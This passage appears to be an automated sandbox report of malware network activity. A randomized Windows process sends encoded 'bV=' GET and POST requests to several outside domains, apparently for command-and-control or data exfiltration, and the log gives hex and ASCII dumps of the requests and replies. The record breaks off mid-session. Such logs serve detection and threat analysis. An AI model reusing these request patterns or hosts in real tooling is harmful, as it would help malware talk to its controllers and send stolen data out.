Timestamp: Dec 2, 2024 15:25:51.355058908 CET | Bytes transferred: 494 | Direction: OUT
Data:
GET /p3j6/?bV=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWG5WAS3psYmnqJIK+9TxAzVw33X+qLRjr2nQR0/ahQ8dw==&wzcP=iLdd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.43kdd.top
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36

Timestamp: Dec 2, 2024 15:25:53.002049923 CET | Bytes transferred: 312 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 Dec 2024 14:25:52 GMT
Content-Type: text/html
Content-Length: 148
Connection: close
ETag: "66df9b06-94"
Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 33 | Source IP: 192.168.2.5 | Source Port: 50009 | Destination IP: 208.91.197.39 | Destination Port: 80 | PID: 728
Process: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp: Dec 2, 2024 15:25:59.039925098 CET | Bytes transferred: 750 | Direction: OUT
Data:
POST /hxi5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Connection: close
Host: www.jcsa.info
Origin: http://www.jcsa.info
Referer: http://www.jcsa.info/hxi5/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Raw: 62 56 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 74 6c 78 6b 34 30 52 66 2b 63 6b 4d 77 64 69 76 59 61 35 6a 77 55 48 70 6e 73 4b 33 52 53 62 72 37 64 46 74 74 47 69 37 65 70 36 44 58 6d 6b 37 4c 6b 5a 6a 6e 33 4c 55 70 49 58 69 52 41 38 4f 33 6b 6e 4e 31 65 53 42 66 78 78 6b 2f 34 2b 4f 41 64 75 56 6d 6e 59 73 33 52 7a 65 7a 6f 33 4a 67 46 61 39 57 74 75 6a 56 4d 78 6d 4c 56 73 63 2f 59 58 44 64 2f 57 55 50 41 44 6a 32 6a 47 76 30 6d 72 37 4d 6f 30 42 59 58 6d 2b 54 72 69 2b 61 4a 36 54 33 41 65 44 4e 65 57 6e 67 2b 5a 47 6f 7a 31 52 57 4a 45 48 35 43 30 48 59 6c 6a 4d 43 33 6a 45 34 46 4f 47 6e 73 3d
Data Ascii: bV=yzleTXLhZhPoxtlxk40Rf+ckMwdivYa5jwUHpnsK3RSbr7dFttGi7ep6DXmk7LkZjn3LUpIXiRA8O3knN1eSBfxxk/4+OAduVmnYs3Rzezo3JgFa9WtujVMxmLVsc/YXDd/WUPADj2jGv0mr7Mo0BYXm+Tri+aJ6T3AeDNeWng+ZGoz1RWJEH5C0HYljMC3jE4FOGns=


Session ID: 34 | Source IP: 192.168.2.5 | Source Port: 50010 | Destination IP: 208.91.197.39 | Destination Port: 80 | PID: 728
Process: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp: Dec 2, 2024 15:26:01.720887899 CET | Bytes transferred: 770 | Direction: OUT
Data:
POST /hxi5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Connection: close
Host: www.jcsa.info
Origin: http://www.jcsa.info
Referer: http://www.jcsa.info/hxi5/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Raw: 62 56 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 4e 31 78 6f 37 73 52 49 4f 63 6e 51 67 64 69 34 49 61 6c 6a 77 59 48 70 6d 5a 58 30 69 6d 62 72 5a 31 46 73 73 47 69 75 65 70 36 4c 33 6e 75 6d 62 6b 6f 6a 6d 4b 32 55 70 30 58 69 52 55 38 4f 31 73 6e 4d 43 4b 54 42 50 78 7a 2f 50 34 38 41 67 64 75 56 6d 6e 59 73 33 46 56 65 31 41 33 4a 51 56 61 37 7a 52 74 2f 6c 4d 79 79 62 56 73 4e 76 59 54 44 64 2f 77 55 4d 45 74 6a 30 62 47 76 78 61 72 31 39 6f 31 57 49 57 74 7a 7a 71 2b 7a 5a 59 70 5a 78 63 57 46 50 48 32 36 6a 69 48 44 65 43 66 4c 30 42 73 55 5a 75 4d 58 4c 74 55 64 79 57 4b 65 62 56 2b 59 77 34 42 2f 55 4c 47 37 4f 52 48 4f 7a 62 50 63 71 32 33 70 66 6c 49
Data Ascii: bV=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0imbrZ1FssGiuep6L3numbkojmK2Up0XiRU8O1snMCKTBPxz/P48AgduVmnYs3FVe1A3JQVa7zRt/lMyybVsNvYTDd/wUMEtj0bGvxar19o1WIWtzzq+zZYpZxcWFPH26jiHDeCfL0BsUZuMXLtUdyWKebV+Yw4B/ULG7ORHOzbPcq23pflI


Session ID: 35 | Source IP: 192.168.2.5 | Source Port: 50011 | Destination IP: 208.91.197.39 | Destination Port: 80 | PID: 728
Process: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp: Dec 2, 2024 15:26:04.398523092 CET | Bytes transferred: 1787 | Direction: OUT
Data:
POST /hxi5/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Connection: close
Host: www.jcsa.info
Origin: http://www.jcsa.info
Referer: http://www.jcsa.info/hxi5/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Raw: 62 56 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 4e 31 78 6f 37 73 52 49 4f 63 6e 51 67 64 69 34 49 61 6c 6a 77 59 48 70 6d 5a 58 30 6a 65 62 71 6f 56 46 73 4c 71 69 6f 75 70 36 46 58 6e 74 6d 62 6b 50 6a 6d 53 79 55 70 34 68 69 54 73 38 4f 51 67 6e 46 54 4b 54 4b 50 78 7a 33 76 34 2f 4f 41 64 42 56 6c 50 63 73 33 56 56 65 31 41 33 4a 57 5a 61 38 6d 74 74 73 31 4d 78 6d 4c 56 4a 63 2f 59 76 44 64 6e 4f 55 4e 77 54 69 41 76 47 76 52 71 72 33 50 77 31 4a 34 57 76 77 7a 71 32 7a 5a 56 78 5a 31 38 77 46 4f 6a 51 36 6a 4b 48 42 59 44 62 61 48 39 37 42 59 58 76 61 72 52 66 50 53 61 34 58 37 5a 6f 64 7a 63 6d 79 41 62 46 7a 37 78 52 4e 77 54 46 4e 75 47 46 37 6f 77 33 47 35 48 4e 65 56 2b 58 68 4e 4a 7a 51 4d 55 52 34 4a 52 6c 43 73 31 77 4b 36 47 5a 61 4d 47 6e 66 32 4d 5a 33 6b 56 53 41 43 59 6c 4a 45 67 33 61 55 73 37 75 55 30 6f 44 52 53 35 6b 77 57 45 4b 67 69 38 67 52 6b 61 4d 30 63 77 55 58 69 6b 48 52 79 42 64 4e 45 62 55 71 55 69 6d 30 70 49 37 37 5a 74 76 79 78 58 6f 69 79 39 4a 6b 31 79 44 62 43 [TRUNCATED]
Data Ascii: bV=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0jebqoVFsLqioup6FXntmbkPjmSyUp4hiTs8OQgnFTKTKPxz3v4/OAdBVlPcs3VVe1A3JWZa8mtts1MxmLVJc/YvDdnOUNwTiAvGvRqr3Pw1J4Wvwzq2zZVxZ18wFOjQ6jKHBYDbaH97BYXvarRfPSa4X7ZodzcmyAbFz7xRNwTFNuGF7ow3G5HNeV+XhNJzQMUR4JRlCs1wK6GZaMGnf2MZ3kVSACYlJEg3aUs7uU0oDRS5kwWEKgi8gRkaM0cwUXikHRyBdNEbUqUim0pI77ZtvyxXoiy9Jk1yDbCkaIkgOP1KHh4Ek9+hCQvpTcP7zH8/47NAUYuHvjXVxG4WCGI2lUP7rlp54gP30GMn/PVG/bOWcWxnpOHxDGpDN3Vgur/6jgGgOe80LAonpUdKAF4JLpUuapEk4MBoCc2+yuWmJ0pA2TtLVgzccRLa5IrMzv9KBlD4GqkBkF4Os17d+YriONsbMfbuzPtCQU0KlEhxwoy4kkqj444MmaZXcXvs1i7Lc+Uy9vAA4oX5qhKd/oQzSP7otgiMWln2HTmZVbMJ8oC/uwbTE4Qj60bxw7b6w5U4oBZgCe8jL0PhKEAvBmTIkj2O2tn+3yqa32uU1xrFM2b+1g+w+hH4Tpmyb8kU4J6UFCiBcJigx6fabWT7eVKqwQWYE9yMzsTRfKfMIdUfWxWRziVz53z1ZWlcFEie72Y/uGv23AcWtkzzWRv3PoIma1sYoa9VK0CQtJU/XUzhFfC7Y+q7/iWDilQD5kcl2ciFpu6TDHV9Mpd1dlcH+7akLchIHqwT5djE4ylwYyV1Z1083dbVMFFZASfMOarPxZAf4LVFPkSIZ0qdl5NCyVZhtGFPv10ZJcMUChgt2f4VmdXKhVNY8FprPDEMcEsn+DS+F2JkHzj+3Kqi1044cfSKYDymAkRhs0525OwsOLdyHi6cqAIHqkobXtxhRE7BbMJ6ST/6y [TRUNCATED]


                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                   36 | 192.168.2.5 | 50012 | 208.91.197.39 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                   Dec 2, 2024 15:26:07.059227943 CET | 494 | OUT | GET /hxi5/?bV=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECOhz/eBMNQtzbXvy0GcsSmUnEXx6wmc7on4m5IV1LddeYQ==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.jcsa.info
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                   Dec 2, 2024 15:26:08.807476997 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:08 GMT
                                                                                                                  Server: Apache
                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                  Set-Cookie: vsid=906vr480695168182053153; expires=Sat, 01-Dec-2029 14:26:08 GMT; Max-Age=157680000; path=/; domain=www.jcsa.info; HttpOnly
                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_PNkdYjVwmf2MQCHTN+qlTy3P5gIK18SRibpMyap0IX997Z3D9wWzF7KSoYTDjZC5xWLTFEn4t7Wbd9vFU/tLhQ==
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 61 63 64 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20
                                                                                                                  Data Ascii: acdb<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">
                                                                                                                   Dec 2, 2024 15:26:08.807610035 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d
                                                                                                                  Data Ascii: <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)
                                                                                                                   Dec 2, 2024 15:26:08.807725906 CET | 1236 | IN | Data Raw: 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e 67 22 26 26 63 6d 70 5f 67
                                                                                                                  Data Ascii: f(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in na
                                                                                                                   Dec 2, 2024 15:26:08.807742119 CET | 1236 | IN | Data Raw: 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 5b 71 5d 2e 6c
                                                                                                                  Data Ascii: n h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d
                                                                                                                   Dec 2, 2024 15:26:08.807931900 CET | 1236 | IN | Data Raw: 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22 2b 28 6e 65 77 20 44 61 74
                                                                                                                  Data Ascii: rams:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.bo
                                                                                                                   Dec 2, 2024 15:26:08.807945967 CET | 694 | IN | Data Raw: 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22
                                                                                                                  Data Ascii: cument.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("tit
                                                                                                                   Dec 2, 2024 15:26:08.852533102 CET | 1236 | IN | Data Raw: 74 72 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 69 66 28 68 3d 3d 67 29 7b 66 3d 63 7d 76 61 72 20 65 3d 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 2b 31 3b 69 66 28 65 3d 3d 30 29 7b 65 3d 62 2e 6c 65 6e
                                                                                                                  Data Ascii: tr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0]==="ping"){if(a[
                                                                                                                   Dec 2, 2024 15:26:08.852550030 CET | 1236 | IN | Data Raw: 64 3b 5f 5f 67 70 70 2e 65 2e 70 75 73 68 28 7b 69 64 3a 63 2c 63 61 6c 6c 62 61 63 6b 3a 66 7d 29 3b 72 65 74 75 72 6e 7b 65 76 65 6e 74 4e 61 6d 65 3a 22 6c 69 73 74 65 6e 65 72 52 65 67 69 73 74 65 72 65 64 22 2c 6c 69 73 74 65 6e 65 72 49 64
                                                                                                                  Data Ascii: d;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,data:true,pingData:window.cmp_gpp_ping()}}else{if(g==="removeEventListener"){var h=false;__gpp.e=__gpp.e||[];for(var d=0;d<__gpp.e.length;d++){if(__gpp.e[d].i
                                                                                                                   Dec 2, 2024 15:26:08.852565050 CET | 1236 | IN | Data Raw: 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75 6c 6c 26 26 22 5f 5f 74 63 66 61 70 69 43 61 6c 6c 22 20 69 6e 20 63 29 7b 76 61 72 20 62 3d 63 2e 5f 5f 74 63 66 61 70 69 43 61 6c 6c 3b 77 69 6e 64 6f 77 2e 5f 5f 74 63 66 61 70 69
                                                                                                                  Data Ascii: c)==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall;window.__tcfapi(b.command,b.version,function(h,g){var e={__tcfapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},b.parameter)
                                                                                                                   Dec 2, 2024 15:26:08.852581024 CET | 1236 | IN | Data Raw: 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 75 73 70 61 70 69 4c 6f 63 61 74 6f 72 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 74 63 66 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61
                                                                                                                  Data Ascii: cmp_addFrame("__uspapiLocator")}if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){window.cmp_addFrame("__tcfapiLocator")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_addFrame("__gppLocator")}window.cmp_setStub("
                                                                                                                   Dec 2, 2024 15:26:08.927750111 CET | 1236 | IN | Data Raw: 6c 6f 63 61 74 69 6f 6e 3d 61 62 70 65 72 75 72 6c 3b 7d 63 61 74 63 68 28 65 72 72 29 7b 7d 7d 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 3d 27 32 39 36 32 37 27 20 62 3d 27 33
                                                                                                                  Data Ascii: location=abperurl;}catch(err){}}</script><meta name="tids" content="a='29627' b='33571' c='jcsa.info' d='entity_mapped'" /><title>Jcsa.info</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" con


                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                   37 | 192.168.2.5 | 50013 | 43.205.198.29 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                   Dec 2, 2024 15:26:15.019341946 CET | 777 | OUT | POST /j8pv/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Host: www.1secondlending.one
                                                                                                                  Origin: http://www.1secondlending.one
                                                                                                                  Referer: http://www.1secondlending.one/j8pv/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4f 52 33 54 75 71 4b 32 67 39 58 30 37 6d 46 50 44 44 71 64 6b 57 31 64 50 6d 38 4c 75 36 36 2f 43 74 37 43 6c 54 35 2b 31 6b 6a 30 72 77 4e 68 50 52 63 2b 51 47 47 4c 36 32 57 50 44 52 62 43 4a 57 48 4d 70 4a 45 7a 31 41 70 2f 59 74 4d 43 52 59 4a 62 4f 51 7a 6f 66 66 57 61 37 78 30 57 42 31 71 45 6c 32 68 6d 55 66 4d 77 50 57 47 2b 33 79 66 39 32 2b 72 47 61 53 70 46 4a 66 35 71 44 71 70 4a 7a 50 50 4b 7a 38 62 6f 4b 51 51 33 77 38 66 66 73 4d 32 70 30 65 30 6d 49 48 52 6f 53 52 50 6f 57 71 6d 33 49 64 4c 69 53 56 35 56 32 68 76 45 36 49 68 31 58 42 77 3d
                                                                                                                  Data Ascii: bV=EKGD+FNVk+GOOR3TuqK2g9X07mFPDDqdkW1dPm8Lu66/Ct7ClT5+1kj0rwNhPRc+QGGL62WPDRbCJWHMpJEz1Ap/YtMCRYJbOQzoffWa7x0WB1qEl2hmUfMwPWG+3yf92+rGaSpFJf5qDqpJzPPKz8boKQQ3w8ffsM2p0e0mIHRoSRPoWqm3IdLiSV5V2hvE6Ih1XBw=
                                                                                                                   Dec 2, 2024 15:26:16.533484936 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:16 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 548
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                   Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                   38 | 192.168.2.5 | 50014 | 43.205.198.29 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                   Dec 2, 2024 15:26:17.693114996 CET | 797 | OUT | POST /j8pv/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.1secondlending.one
                                                                                                                  Origin: http://www.1secondlending.one
                                                                                                                  Referer: http://www.1secondlending.one/j8pv/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
